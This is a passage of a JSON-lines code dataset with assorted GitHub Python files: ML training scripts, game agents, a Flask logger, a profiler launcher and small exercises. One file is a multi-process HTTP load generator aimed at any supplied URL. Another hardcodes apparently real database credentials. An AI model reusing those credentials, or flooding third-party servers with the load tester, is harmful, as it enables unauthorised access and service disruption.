padding=\"valid\", data_format=\"channels_last\")(conv_3)\n maxpool_4 = 
MaxPooling2D(pool_size=(sequence_length - filter_sizes[4] + -2, 1), strides=(1,1),padding=\"valid\", data_format=\"channels_last\")(conv_4)\n\n merged = concatenate([maxpool_0, maxpool_1, maxpool_2, maxpool_3, maxpool_4], axis=1)\n \n output = Dense(units=2048, activation='sigmoid')( \\\n Activation('linear')( \\\n Dropout(0.5)( \\\n Flatten()(merged) ) ) )\n\n model = Model(inputs=inputs, outputs=output)\n adam = Adam()\n model.compile(optimizer=adam, loss='binary_crossentropy', metrics=['accuracy'])\n\n return model\n\ndef main_train():\n print(\"importing data from serialized...\")\n text_vec = pickle.loads(open('./text_vec.pkl', 'rb').read())\n print(\"finished data from serialized...\")\n\n print('Vectorization...')\n X = np.zeros((len(text_vec), 30, 256), dtype=np.float64)\n y = np.zeros((len(text_vec), 2048), dtype=np.float64)\n for i, (text, ans) in enumerate(text_vec):\n if i%10000 == 0:\n print(\"building training vector... iter %d\"%i)\n for t, term in enumerate(text):\n X[i, t, :] = term\n y[i, :] = ans\n model = discriminator_model()\n for iteration in range(1, 101):\n print()\n print('-' * 50)\n print('Iteration', iteration)\n model.fit(X, y, batch_size=128, nb_epoch=1)\n MODEL_NAME = \"./models/snapshot.%09d.model\"%(iteration)\n model.save(MODEL_NAME)\n sys.exit()\n\ndef pred():\n m = MeCab.Tagger('-Owakati')\n emoji_index = pickle.loads(open('./emoji_index.pkl', 'rb').read())\n index_emoji = {index:emoji for emoji, index in emoji_index.items()}\n \n print('now loading term_vec.pkl...')\n term_vec = pickle.loads(open('term_vec.pkl', 'rb').read())\n print('finished loading term_vec.pkl...')\n model_type = sorted(glob.glob('./models/*.model'))[-1]\n print(\"model type is %s\"%model_type)\n model = load_model(model_type)\n print(\"finished model type is %s\"%model_type)\n for line in sys.stdin:\n line = line.strip()\n print(line, end=\" \")\n buff = [\"*\"]*30\n for i,term in enumerate(m.parse(line).strip().split()[:30]):\n buff[i] = term\n X = []\n for term in buff:\n if term_vec.get(term) is not None:\n X.append(term_vec[term])\n else:\n X.append(term_vec[\"*\"])\n results = model.predict(np.array([X]))\n res = {index_emoji[i]:score for i,score in enumerate(results[0].tolist())}\n for emoji, score in sorted(filter(lambda x:x[1]>0.01, res.items()), key=lambda x:x[1]*-1)[:20]:\n print(emoji, \"%d\"%(int(score*100)), end=\" \")\n print()\ndef main():\n if '--train' in sys.argv:\n main_train()\n if '--pred' in sys.argv:\n pred()\nif __name__ == '__main__':\n main()\n","repo_name":"GINK03/emotion2vec","sub_path":"keras-text2vec.py","file_name":"keras-text2vec.py","file_ext":"py","file_size_in_byte":5722,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"11707255012","text":"'''Given an array of integers, where all elements but one occur twice, find the unique element.'''\n#XOR returns the non repeated integer\n\ndef lonelyinteger(a):\n # Write your code here\n res=0\n \n for i in a:\n res ^= i\n return res\n","repo_name":"MERN0/Hackerrank_Sol","sub_path":"Lonely Integer.py","file_name":"Lonely Integer.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24621547033","text":"import hashlib\nimport socket\nfrom random import choice\nfrom time import sleep\n\nimport random\n\nimport os\n\nimport copy\n\nclass NaiveAgent():\n\t\"\"\"This class describes the default Hex agent. 
It will randomly send a\n\tvalid move at each turn, and it will choose to swap with a 50% chance.\n\t\"\"\"\n\n\tHOST = \"127.0.0.1\"\n\tPORT = 1234\n\n\tdef __init__(self, board_size=11):\n\t\tself.s = socket.socket(\n\t\t\tsocket.AF_INET, socket.SOCK_STREAM\n\t\t)\n\n\t\tself.s.connect((self.HOST, self.PORT))\n\n\t\tself.board_size = board_size\n\t\tself.board = []\n\t\tself.colour = \"\"\n\t\tself.turn_count = 0\n\t\tself.v = {}\n\t\tself.history = []\n\t\tself.LAMBDA = .75\n\t\tself.ALPHA = 0.2\n\n\n\n\tdef run(self):\n\t\t\"\"\"Reads data until it receives an END message or the socket closes.\"\"\"\n\n\t\twhile True:\n\t\t\tdata = self.s.recv(1024)\n\t\t\tif not data:\n\t\t\t\tbreak\n\t\t\t# print(f\"{self.colour} {data.decode('utf-8')}\", end=\"\")\n\t\t\tif (self.interpret_data(data)):\n\t\t\t\tbreak\n\n\t\t# print(f\"Naive agent {self.colour} terminated\")\n\n\tdef interpret_data(self, data):\n\t\t\"\"\"Checks the type of message and responds accordingly. Returns True\n\t\tif the game ended, False otherwise.\n\t\t\"\"\"\n\n\t\tmessages = data.decode(\"utf-8\").strip().split(\"\\n\")\n\t\tmessages = [x.split(\";\") for x in messages]\n\t\t# print(messages)\n\t\tfor s in messages:\n\t\t\tif s[0] == \"START\":\n\t\t\t\tself.board_size = int(s[1])\n\t\t\t\tself.colour = s[2]\n\t\t\t\tself.board = [\n\t\t\t\t\t[0]*self.board_size for i in range(self.board_size)]\n\n\t\t\t\tif self.colour == \"R\":\n\t\t\t\t\tself.make_move()\n\n\t\t\telif s[0] == \"END\":\n\t\t\t\tif(s[1] == self.colour):\n\t\t\t\t\tself.update_end(1)\n\t\t\t\telse:\n\t\t\t\t\tself.update_end(0)\n\t\t\t\treturn True\n\n\t\t\telif s[0] == \"CHANGE\":\n\t\t\t\tif s[3] == \"END\":\n\t\t\t\t\t# return True\n\t\t\t\t\tpass\n\n\t\t\t\telif s[1] == \"SWAP\":\n\t\t\t\t\tself.colour = self.opp_colour()\n\t\t\t\t\tif s[3] == self.colour:\n\t\t\t\t\t\tself.make_move()\n\n\t\t\t\telif s[3] == self.colour:\n\t\t\t\t\taction = [int(x) for x in s[1].split(\",\")]\n\t\t\t\t\tself.board[action[0]][action[1]] = self.opp_colour()\n\t\t\t\t\t#self.history.append(copy.deepcopy(self.board))\n\t\t\t\t\tself.make_move()\n\n\t\treturn False\n\n\tdef make_move(self):\n\t\t\"\"\"Makes a random move from the available pool of choices. 
If it can\n\t\tswap, chooses to do so 50% of the time.\n\t\t\"\"\"\n\n\t\t# print(f\"{self.colour} making move\")\n\t\tif self.colour == \"B\" and self.turn_count == 0:\n\t\t\tif choice([0, 1]) == 1:\n\t\t\t\tself.s.sendall(bytes(\"SWAP\\n\", \"utf-8\"))\n\t\t\telse:\n\t\t\t\t# same as below\n\t\t\t\tchoices = []\n\t\t\t\tfor i in range(self.board_size):\n\t\t\t\t\tfor j in range(self.board_size):\n\t\t\t\t\t\tif self.board[i][j] == 0:\n\t\t\t\t\t\t\tchoices.append((i, j))\n\t\t\t\tpos = self.choose_move(choices)\n\t\t\t\tself.s.sendall(bytes(f\"{pos[0]},{pos[1]}\\n\", \"utf-8\"))\n\t\t\t\tself.board[pos[0]][pos[1]] = self.colour\n\t\t\t\tself.history.append(copy.deepcopy(self.board))\n\n\t\telse:\n\t\t\tchoices = []\n\t\t\tfor i in range(self.board_size):\n\t\t\t\tfor j in range(self.board_size):\n\t\t\t\t\tif self.board[i][j] == 0:\n\t\t\t\t\t\tchoices.append((i, j))\n\t\t\tpos = self.choose_move(choices)\n\t\t\tself.s.sendall(bytes(f\"{pos[0]},{pos[1]}\\n\", \"utf-8\"))\n\t\t\tself.board[pos[0]][pos[1]] = self.colour\n\t\t\tself.history.append(copy.deepcopy(self.board))\n\t\tself.turn_count += 1\n\n\tdef opp_colour(self):\n\t\t\"\"\"Returns the char representation of the colour opposite to the\n\t\tcurrent one.\n\t\t\"\"\"\n\t\tif self.colour == \"R\":\n\t\t\treturn \"B\"\n\t\telif self.colour == \"B\":\n\t\t\treturn \"R\"\n\t\telse:\n\t\t\treturn \"None\"\n\n\tdef choose_move(self, choices):\n\t\tmoves_outcome = []\n\t\tfor choice in choices:\n\t\t\tr = choice[0]\n\t\t\tc = choice[1]\n\t\t\tboard_copy = copy.deepcopy(self.board)\n\t\t\t# board_copy = self.convert_board_to_list_of_strings(board_copy)\n\t\t\t# board_copy[r] = board_copy[r][:c] + self.colour + board_copy[r][c+1:]\n\t\t\tboard_copy[r][c] = self.colour\n\t\t\t\n\t\t\tmoves_outcome.append([choice, self.get_reward(board_copy)])\n\t\tmoves_outcome.sort(key = lambda v :v[1], reverse = True)\n\t\tcount = 0\n\t\twhile(count < len(moves_outcome)-1 and moves_outcome[count+1][1] == moves_outcome[0][1]):\n\t\t\tcount += 1\n\n\t\ti = random.randint(0, count)\n\n\t\treturn moves_outcome[i][0]\n\n\tdef get_reward(self, board):\n\t\tboard_string = self.convert_board_to_string(board)\n\t\treturn self.v.get(board_string, 0.5)\n\n\tdef convert_list_of_strings_to_board(self, list_of_strings):\n\t\tnew = []\n\t\tfor line in list_of_strings:\n\t\t\tnew.append(list(line))\n\t\treturn new\n\t\t\t\n\n\tdef convert_board_to_list_of_strings(self, board):\n\t\tnew = []\n\t\tfor row in board:\n\t\t\tnew_row = \"\"\n\t\t\tfor el in row:\n\t\t\t\tnew_row += str(el)\n\t\t\tnew.append(new_row)\n\t\treturn new\n\n\tdef convert_board_to_string(self, board):\n\t\tnew = self.convert_board_to_list_of_strings(board)\n\t\treturn \"\".join(new)\n\n\tdef update_end(self, r):\n\t\tlist_states = copy.deepcopy(self.history)\n\t\tlist_states.reverse()\n\t\tfor count, state in enumerate(list_states):\n\t\t\ttd_error = r - self.get_reward(state)\n\t\t\tupdate_value = self.ALPHA * (td_error + (self.LAMBDA ** (len(list_states)-count)) )\n\t\t\tself.set_reward(state, self.get_reward(state) + update_value)\n\t\tself.store_v()\n\n\tdef set_reward(self, board_state, value):\n\t\tboard_string = self.convert_board_to_string(board_state)\n\t\tself.v[board_string] = value\n\t\n\tdef store_v(self):\n\t\tpass\n\n\t\t\n\n\n\t\t\n\n\n\nif (__name__ == \"__main__\"):\n\tagent = 
NaiveAgent()\n\tagent.run()\n","repo_name":"samuelzureick/HexGame","sub_path":"agents/Group52/nol.py","file_name":"nol.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2781660304","text":"import logging.config\nimport time\n\nfrom flask import request, g\n\nfrom blueprints import init_app\n\nlogging.config.fileConfig('logging.conf', defaults={'logfilename': 'log.log'})\nlogger = logging.getLogger('Request&Response')\n\napp = init_app()\n\n\n@app.before_request\ndef log_request():\n \"\"\"\n Log all requests to a file\n \"\"\"\n if request.path == '/favicon.ico':\n return\n elif request.path.startswith('/static'):\n return\n\n g.start = time.time()\n request_data = f\"\"\"\\nRequest:\n Method: {request.method}\n Path: {request.path}\n IP: {request.headers.get('X-Forwarded-For', request.remote_addr)}\n HOST: {request.host.split(':', 1)[0]}\n Headers: {dict(request.headers)}\n Params: {dict(request.args)}\n Body: {request.get_data()}\n\"\"\"\n logger.info(request_data)\n\n\n@app.after_request\ndef log_request(response):\n \"\"\"\n Log all responses to a file\n \"\"\"\n if request.path == '/favicon.ico':\n return response\n elif request.path.startswith('/static'):\n return response\n\n duration = round(time.time() - g.start, 5)\n response_data = f\"\"\"\\nResponse:\n Status code: {response.status_code}\n Time spent: {duration} secs\n\"\"\"\n logger.info(response_data)\n return response\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n","repo_name":"necutya/flask-member-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28147052963","text":"\"\"\"\nStarts profiling, expected to start with normal program\nto start as first argument and directory to run from as\nthe second argument.\n\"\"\"\n\nimport sys\n\nif sys.platform == 'cli':\n print('Python profiling is not supported on IronPython, press enter to exit...')\n raw_input()\n sys.exit(1)\n\nimport vspyprof\nimport os\n\n# arguments are path to profiling DLL, working dir, normal arguments which should include a filename to execute\n\n# change to directory we expected to start from\nos.chdir(sys.argv[2])\nprofdll = sys.argv[1]\n\n# fix sys.path to be our real starting dir, not this one\nsys.path[0] = sys.argv[2]\ndel sys.argv[0:3]\t\n\n# set file appropriately, fix up sys.argv...\n__file__ = sys.argv[0]\n\n# remove all state we imported\ndel sys, os\n\n# and start profiling\ntry:\n vspyprof.profile(__file__, globals(), locals(), profdll)\nexcept SystemExit:\n import sys, msvcrt, os\n if sys.exc_info()[1].code:\n env_var = 'VSPYPROF_WAIT_ON_ABNORMAL_EXIT'\n else:\n env_var = 'VSPYPROF_WAIT_ON_NORMAL_EXIT'\n if env_var in os.environ:\n sys.stdout.write('Press any key to continue . . .')\n sys.stdout.flush()\n msvcrt.getch()\nexcept:\n import sys, msvcrt, os, traceback\n if 'VSPYPROF_WAIT_ON_ABNORMAL_EXIT' in os.environ:\n traceback.print_exc()\n sys.stdout.write('Press any key to continue . . .')\n sys.stdout.flush()\n msvcrt.getch()\n else:\n raise\nelse:\n import sys, msvcrt, os\n if 'VSPYPROF_WAIT_ON_NORMAL_EXIT' in os.environ:\n sys.stdout.write('Press any key to continue . . 
.')\n        sys.stdout.flush()\n        msvcrt.getch()\n","repo_name":"microsoft/PTVS","sub_path":"Python/Product/Profiling/proflaun.py","file_name":"proflaun.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":2481,"dataset":"github-code","pt":"48"} +{"seq_id":"6795204861","text":"import tensorflow as tf\nimport numpy as np\nimport time\nimport datetime\nfrom swarm import SwarmCallback\nimport os\n\ndefault_max_epochs = 5\ndefault_min_peers = 2\n\ndef load_data(dataDir):\n    \"\"\"Loads the MNIST dataset.\n    # Arguments\n        dataDir: path where to find the mnist.npz file\n    # Returns\n        Tuple of Numpy arrays: `(x_train, y_train), (x_test, y_test)`.\n    \"\"\"\n    path = os.path.join(dataDir,'mnist.npz') \n\n    with np.load(path, allow_pickle=True) as f:\n        x_train, y_train = f['x_train'], f['y_train']\n        x_test, y_test = f['x_test'], f['y_test']\n    return (x_train, y_train), (x_test, y_test)\n\n\ndef main():\n    dataDir = os.getenv('DATA_DIR', './data')\n    modelDir = os.getenv('MODEL_DIR', './model')\n    modelDir = os.getenv('MODEL_DIR', './model')\n    max_epochs = int(os.getenv('MAX_EPOCHS', str(default_max_epochs)))\n    min_peers = int(os.getenv('MIN_PEERS', str(default_min_peers)))\n\n    model_name = 'mnist_tf'\n\n    (x_train, y_train),(x_test, y_test) = load_data(dataDir)\n    x_train, x_test = x_train / 255.0, x_test / 255.0\n\n    model = tf.keras.models.Sequential([\n        tf.keras.layers.Flatten(input_shape=(28, 28)),\n        tf.keras.layers.Dense(512, activation=tf.nn.relu),\n        tf.keras.layers.Dropout(0.2),\n        tf.keras.layers.Dense(10, activation=tf.nn.softmax)\n    ])\n\n    model.compile(optimizer='adam',\n                  loss='sparse_categorical_crossentropy',\n                  metrics=['accuracy'])\n\n    # Create Swarm callback\n    swarmCallback = SwarmCallback(sync_interval=128,\n                                  min_peers=min_peers,\n                                  val_data=(x_test, y_test),\n                                  val_batch_size=32,\n                                  model_name=model_name)\n\n    model.fit(x_train, y_train, \n              batch_size = 128,\n              epochs=max_epochs,\n              verbose=1, \n              callbacks=[swarmCallback])\n\n    # Save model and weights\n    model_path = os.path.join(modelDir, model_name)\n    model.save(model_path)\n    print('Saved the trained model!')\n\nif __name__ == '__main__':\n    main()\n","repo_name":"CoderTylor/IoV-SFDL-Swarm-Federated-Deep-Learning","sub_path":"swarm-learning/examples/ws-mnist-keras/node1/model/mnist_tf.py","file_name":"mnist_tf.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"48"} +{"seq_id":"74622515025","text":"import sys\nimport threading\nimport multiprocessing\nimport time\nimport signal\nfrom multiprocessing import Manager\nfrom urllib.request import urlopen\n\ndo_count = 0\nis_running = True\n\n\nclass WorkThread(threading.Thread):\n    def __init__(self, url):\n        threading.Thread.__init__(self)\n        self.url = url\n        self.isSuccess = True\n\n    def run(self):\n        try:\n            response = urlopen(self.url)\n        except OSError:\n            self.isSuccess = False\n            pass\n\n    def get_result(self):\n        return self.isSuccess\n\n\nclass JobProcess(multiprocessing.Process):\n    def __init__(self, thread_count, url, extime):\n        multiprocessing.Process.__init__(self)\n        self.thread_count = thread_count\n        self.url = url\n        if extime < 0:\n            extime = 0\n        self.extime = extime\n        \"\"\"Create shared list variables via Manager() here; otherwise both counters would always stay 0\"\"\"\n        self.success = Manager().list()\n        self.failure = Manager().list()\n\n    def run(self):\n\n        time.sleep(self.extime)\n\n        works = []\n\n        for i in range(self.thread_count):\n            \"\"\"Passing args here is very awkward: (url) raises an error, only (url,) works\"\"\"\n            works.append(WorkThread(self.url))\n\n        for w 
in works:\n w.start()\n w.join()\n if w.get_result():\n self.success.append(w.get_result())\n else:\n self.failure.append(w.get_result())\n pass\n\n def get_success_count(self):\n return len(self.success)\n\n def get_failure_count(self):\n return len(self.failure)\n\n\ndef exec_thread(count, process_count, thread_count, interval_time, url):\n global do_count, is_running\n if do_count >= count:\n sys.exit(0)\n else:\n do_count += 1\n\n if process_count <= 0 or thread_count <= 0:\n print(\"警告:执行进程数或者线程数为零\")\n sys.exit(0)\n\n ctime, diff_time, jobs = time.time(), process_count * 0.5, []\n for i in range(process_count):\n job = JobProcess(thread_count, url, diff_time)\n job.start()\n jobs.append(job)\n diff_time = diff_time - (time.time() - ctime)\n\n success = 0\n failure = 0\n\n for j in jobs:\n j.join()\n success += j.get_success_count()\n failure += j.get_failure_count()\n\n print(\"执行结果| \", \"耗时=\" + str(time.time() - ctime) + \" | \", \"进程数=\" + str(process_count) + \" | \",\n \"每个进程的线程数=\" + str(thread_count) + \" | \", \"成功数=\" + str(success) + \" | \", \"失败数=\" + str(failure))\n\n if is_running:\n next_timer = threading.Timer(interval_time, exec_thread,\n [count, process_count, thread_count, interval_time, url])\n next_timer.start()\n\n\ndef quit_pro(signum, frame):\n global is_running\n is_running = False\n\n\nhelpStr = \"argv[0] #执行的次数\\r\\n\" + \\\n \"argv[1] #进程数\\r\\n\" + \\\n \"argv[2] #线程数\\r\\n\" + \\\n \"argv[3] #间隔时间s\\r\\n\" + \\\n \"argv[4] #访问的url\\r\\n\"\n\nargv = sys.argv\nif __name__ == \"__main__\":\n try:\n if len(argv) != 6:\n print(\"参数错误,传参格式如下:\\r\\n\" + helpStr)\n print(argv)\n sys.exit(-1)\n\n signal.signal(signal.SIGINT, quit_pro)\n signal.signal(signal.SIGTERM, quit_pro)\n\n c = int(argv[1])\n pc = int(argv[2])\n tc = int(argv[3])\n s = int(argv[4])\n url = str(argv[5])\n\n timer = threading.Timer(0, exec_thread, [c, pc, tc, s, url])\n timer.start()\n except Exception:\n raise\n","repo_name":"yangankang/examples","sub_path":"python_tools/press_test.py","file_name":"press_test.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"42018828744","text":"import sys\nsys.path.append(r\"C:\\Users\\souli\\Documents\\Travail\\EFREI\\M2\\PFE\\MLUI\\PluginSource\")\n\nfrom python.MCTSAgent.Agent import Agent\nfrom python.Train.Residual_CNN import HIDDEN_CNN_LAYERS\nfrom python.Train.Residual_CNN import Residual_CNN, REG_CONST\nfrom python.connect4.Game import GRID_SHAPE, Game, GameState\nfrom IPython.display import clear_output\nimport numpy as np\n\nNB_SIMULATION = 50\nTOURNAMENT_NUMBER = 1\nAGENT_VERSION = 9\n\nresidual_CNN = Residual_CNN(REG_CONST, (1,) + GRID_SHAPE, GRID_SHAPE[1], HIDDEN_CNN_LAYERS)\nresidual_CNN.read(TOURNAMENT_NUMBER, AGENT_VERSION,\"./python/Train/\")\n\nai_agent = Agent(\"Demo ML Agent\", nb_simulations=NB_SIMULATION, cpuct=1, model=residual_CNN,\n turns_until_deterministic=0, temperature=1)\n\nprint(\"Ai loaded\")\n\ndef play(board=None, me=1):\n print(\"\\nLet's play\")\n print(board)\n #Default board\n #if board==None:\n board = [[0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0]]\n #Convert board for the AI\n board = np.array(board, dtype=np.int8) \n print(\"board converted\")\n\n #Create game state\n state = GameState(me, board=board)\n print(state)\n\n #Ask agent for its decision\n action, _, _ = ai_agent.chose_action_from_mcts(state, 1)\n 
print(\"decision: \", action)\n    return action\n    \"\"\"\n    \n    #Make a prediction on the board\n    result = residual_CNN.predict(inputToModel) \n    print(result)\n\n    #Send the action decided by the AI\n    choice = np.argmax(result[1][0])\n    return choice\n    \"\"\"\n\ndef playerVersusAI(ai_player, ai_plays_first=False, debug=False):\n\n    env = Game()\n    state = env.reset()\n\n    turn = 0\n    done = False\n\n    while not done:\n\n        print(env.gameState)\n\n        turn = turn + 1\n        is_ai_current_player = True if (turn % 2 == 0) and not ai_plays_first else False\n\n        ## If the AI player has to play\n        if is_ai_current_player:\n            action, action_scores, current_proba_victory = ai_player.chose_action_from_mcts(state, turn, debug)\n            \n            if not debug:\n                clear_output(wait=True)\n            print('action: ', action)\n            print(['{0:.2f}'.format(np.round(x,2)) for x in action_scores])\n            print('proba of victory before playing the action: ', np.round(current_proba_victory,2))\n        else:\n            correct_action = False\n            while not correct_action:\n                print(\"Please enter an integer between 0 and \" + str(GRID_SHAPE[1]-1))\n                action = int(input())\n                correct_action = True if (action >= 0 and action < GRID_SHAPE[1]) else False\n\n            if not debug:\n                clear_output(wait=True)\n\n        state, value, done = env.step(action)\n        print('Current state value (1 if victory, 0 otherwise): ', value)\n        print('done: ', done)\n        \n    # Print the board when the game is finished\n    print(env.gameState)\n\nif __name__ == '__main__':\n    playerVersusAI(ai_agent)","repo_name":"ZaChr0me/MLUI","sub_path":"PluginSource/python/AiDemo.py","file_name":"AiDemo.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74857082704","text":"a=\"123456789\"\r\n\r\nfor i in range(9999,9000,-1):\r\n\tb=str(i*1)\r\n\tc=str(i*2)\r\n\td=b+c\r\n\te=d\r\n\te=sorted(e)\r\n\te = ''.join(e)\r\n\tif e==a:\r\n\t\tprint(d)\r\n\t\tbreak\r\n\r\n\r\n\r\n","repo_name":"bhanusiddhannagari/project-euler","sub_path":"p38.py","file_name":"p38.py","file_ext":"py","file_size_in_byte":157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34461698844","text":"import random\nimport sys\nimport pygame\nfrom constants import black, white, display_height, display_width, car_width, clock, gameDisplay, carImg, carImg2, bg\nfrom functions import text_objects, things, car, car2, things_dodged, crash\n\n# initialize the pygame modules\npygame.init()\n\n# function that runs the game\ndef game_loop():\n    # placement\n    x = (display_width * 0.75)\n    y = (display_height * 0.8)\n    x1 = (display_width * 0.25)\n    y1 = (display_height * 0.8)\n    # parameters for spawning things\n    thing_startx = random.randrange(0, display_width)\n    thing_starty = -600\n    thing_speed = 5\n    thing_width = 72\n    thing_height = 72\n\n    # initial value for dodged\n    dodged = 0\n\n    x_change = 0 # position\n    x1_change = 0 # position\n    gameExit = False\n\n    while not gameExit:\n\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                pygame.quit()\n                gameExit = True\n                sys.exit()\n            # block that handles key presses\n            if event.type == pygame.KEYDOWN:\n                # if esc is pressed, close the window\n                if event.key == pygame.K_ESCAPE:\n                    crashed = True\n                    pygame.quit()\n                    sys.exit()\n                if event.key == pygame.K_LEFT:\n                    x_change = -5\n\n                if event.key == pygame.K_a:\n                    x1_change = -5\n\n                elif event.key == pygame.K_RIGHT:\n                    x_change = 5\n\n                elif event.key == pygame.K_d:\n                    x1_change = 5\n\n            # movement conditions\n            if event.type == 
pygame.KEYUP:\n                if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n                    x_change = 0\n            # movement conditions\n            if event.type == pygame.KEYUP:\n                if event.key == pygame.K_a or event.key == pygame.K_d:\n                    x1_change = 0\n        # update position\n        x += x_change\n\n        # update position 2\n        x1 += x1_change\n\n        # background\n        gameDisplay.blit(bg,(0,0))\n        # spawn things\n        things(thing_startx, thing_starty)\n        thing_starty += thing_speed\n\n        # create the car\n        car(x, y)\n        things_dodged(dodged)\n\n        # create car 2\n        car2(x1, y1)\n        things_dodged(dodged)\n\n        # set the boundaries\n        if x > display_width - car_width or x < 0:\n            gameExit = True\n            crash()\n        # set the boundaries\n        if x1 > display_width - car_width or x1 < 0:\n            gameExit = True\n            crash()\n\n        if thing_starty > display_height:\n            thing_starty = 0 - thing_height\n            thing_startx = random.randrange(0, display_width)\n            dodged += 1\n            thing_speed += 1\n            # thing_width += (dodged * 1.2)\n\n        if y < thing_starty + thing_height:\n\n            if x > thing_startx and x < thing_startx + thing_width or x + car_width > thing_startx and x + car_width < thing_startx + thing_width:\n                crash()\n        if y1 < thing_starty + thing_height:\n\n            if x1 > thing_startx and x1 < thing_startx + thing_width or x1 + car_width > thing_startx and x1 + car_width < thing_startx + thing_width:\n                crash()\n\n        # check for display updates\n        pygame.display.update()\n        # frames per second = 60\n        clock.tick(60)\n\ngame_loop()\npygame.quit()\nquit()","repo_name":"Maginiex/Don-t-crush-my-car-dude-","sub_path":"venv/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25052315417","text":"def solution(classes, m):\n    answer = 0\n    for students in classes: #iterate over each classroom's student count\n        answer += students// m #students // students per assistant, e.g. 80//30 => 2\n        if students % m != 0: #if there is a remainder\n            answer += 1 #add one more teaching assistant\n    return answer\n\nclasses = [80, 45, 33, 20]\nm = 30\nret = solution(classes, m)\nprint(\"solution 함수의 반환 값은\", ret, \"입니다.\")","repo_name":"krsthg/python3","sub_path":"COS PRO_2/4차시/문제 4.py","file_name":"문제 4.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72549285586","text":"'''\nWrite a program that reads 5 integer values. 
Count how many of the \nentered values are even and display this information.\n'''\ni = 0\nnum = []\nwhile i < 5:\n\ta = int(input())\n\tnum.append(a)\n\ti+=1\ni = 0\nfor x in num:\n\tif x % 2 == 0:\n\t\ti +=1\nprint('%d valores pares' %i)","repo_name":"ClaudiaStrm/UriOnlineJudge","sub_path":"i_paresEntre5Num.py","file_name":"i_paresEntre5Num.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32334651282","text":"from googlesearch import search\nimport mysql.connector\n\nmydb = mysql.connector.connect(\n    host=\"hosp.ctt1wmriltj5.us-east-2.rds.amazonaws.com\",\n    user=\"rfodge\",\n    passwd=\"Yy6bxM-G\",\n    database=\"hosp\"\n)\n\nmycursor = mydb.cursor()\nmycursor.execute(\"SELECT WEBSITE FROM hospitalList\")\nmyresult = mycursor.fetchall()\n\nwebsiteList = []\n\nfor x in myresult:\n    websiteList.append(str(x))\n\nwebsiteList = [e[3:len(e)-3] for e in websiteList]\nPDFresultsList = []\nCSVresultsList = []\nXLSresultsList = []\nXLSXresultsList = []\nXMLresultsList = []\n\nfor y in websiteList:\n    print('------')\n    PDFquery = \"site:\" + y + \" filetype:pdf\"\n    CSVquery = \"site:\" + y + \" filetype:csv\"\n    XLSquery = \"site:\" + y + \" filetype:xls\"\n    XLSXquery = \"site:\" + y + \" filetype:xlsx\"\n    XMLquery = \"site:\" + y + \" filetype:xml\"\n    for a in search(PDFquery, tld=\"co.in\", num=10, stop=1, pause=2) :\n        print(a)\n    for b in search(CSVquery, tld=\"co.in\", num=10, stop=1, pause=2) :\n        print(b)\n    for c in search(XLSquery, tld=\"co.in\", num=10, stop=1, pause=2) :\n        print(c)\n    for d in search(XLSXquery, tld=\"co.in\", num=10, stop=1, pause=2) :\n        print(d)\n    for e in search(XMLquery, tld=\"co.in\", num=10, stop=1, pause=2) :\n        print(e)\n","repo_name":"reedfodge/hosp","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11343400228","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import mean_absolute_error\n\nimport matplotlib.pyplot as plt\n\n\nclass Stats:\n    def __init__(self, data):\n\n        baseline_array_cum, actual_array_cum, baseline_median_array_cum = self._calc_baseline_and_actual(\n            data\n        )\n\n        self.baseline_array_cum = baseline_array_cum\n        self.actual_array_cum = actual_array_cum\n        self.baseline_median_array_cum = baseline_median_array_cum\n        self.first_20mins_mask = actual_array_cum < 20 * 60\n        self.data = data\n\n    def full_stats(self, tests, names, data_type=\"diff\"):\n\n        if data_type 
